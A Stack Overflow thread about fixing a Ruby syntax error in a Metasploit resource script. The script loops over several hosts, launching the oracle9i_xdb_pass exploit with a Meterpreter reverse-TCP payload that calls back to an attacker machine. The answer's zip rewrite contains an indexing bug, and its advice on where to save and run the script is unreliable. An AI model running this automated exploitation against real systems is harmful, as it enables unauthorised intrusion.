How to fix syntax error while running Ruby script in Metasploit

Question

I've been trying to automate Metasploit, but could not find success.

I want a text file of hosts to undergo the same exploit ("oracle9i_xdb_pass"), with the same options.

This is my code:

 <ruby>
    lports = ["80","443","445"]
    index = 0;
    targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
    targets.each do |target|
        run_single("use exploit/windows/http/oracle9i_xdb_pass")
        run_single("set LHOST 192.168.2.7")
        run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
        run_single("set LPORT #{lports[index]}")
        run_single("set RHOST #{target}")
        run_single("set ExitOnSession false")
        run_single("exploit -j -z")
        index = index + 1
   end
 </ruby>

The issue is, when I run this programm using ruby xploit.rb, I get this error:

ruby exploit.rb
exploit.rb:1: syntax error, unexpected '<'
<ruby>
 ^
exploit.rb:15: syntax error, unexpected '<', expecting end-of-input
</ruby>

did you try running the file without the `` html opening and closing tags? — kparekh01, Apr 10 '17 at 18:54
no tags needed when executing a .rb file. `<%= %>` something you can use if you want to display ruby via an html.erb file — kparekh01, Apr 10 '17 at 19:03
Welcome to Stack Overflow. We don't care what your experience using a language is, we just want well researched and asked questions. Please don't use salutations, valedictions or signatures. SO is not a discussion board, it's a reference site, so conciseness and readability are valued. "[ask]" and "[mcve]" and their linked pages are good reading. — the Tin Man, Apr 10 '17 at 21:38
For information, there is a confusion here between Metasploit resource files and ruby scripts. In a Metasploit resource file, you do need the tags `` and `` to talk directly with the API with ruby language. Code outside these tags is not ruby, but Metasploit or session command lines. For instance, outside `` tags, you juste have to use a `sysinfo` directive to automate the execution of `sysinfo` in a meterpreter session. Inside the tags, this is ruby, so you have to use the API to run the same thing: `client.run_cmd("sysinfo")` — NdFeB, Sep 23 '20 at 03:54

score 1 · Answer 1 · edited Apr 10 '17 at 21:36

I don't know where you got the idea to use <ruby> tags in your code, but they're not a thing in Ruby. Removing them gives you a valid Ruby script:

lports = ["80","443","445"]
index = 0;
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.each do |target|
    run_single("use exploit/windows/http/oracle9i_xdb_pass")
    run_single("set LHOST 192.168.2.7")
    run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
    run_single("set LPORT #{lports[index]}")
    run_single("set RHOST #{target}")
    run_single("set ExitOnSession false")
    run_single("exploit -j -z")
    index = index + 1
end

While that should run, a neat Ruby trick is to do this:

lports = ["80","443","445"]
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.zip(lports).each do |target, lport|
    run_single("use exploit/windows/http/oracle9i_xdb_pass")
    run_single("set LHOST 192.168.2.7")
    run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
    run_single("set LPORT #{lports[lport]}")
    run_single("set RHOST #{target}")
    run_single("set ExitOnSession false")
    run_single("exploit -j -z")
end

Using zip merges your arrays together so you can iterate through them both at the same time, eliminating the need for an index variable, then all you need to do is run your script.

I don't think ruby exploit.rb will work since you're using special metasploit functions. You need to open a meterpreter shell and run:

> run exploit

For this to work, your exploit needs to be saved in the right folder. On Linux, it would be:

/usr/share/metasploit-framework/scripts/meterpreter/exploit.rb

How to fix syntax error while running Ruby script in Metasploit

1 Answers1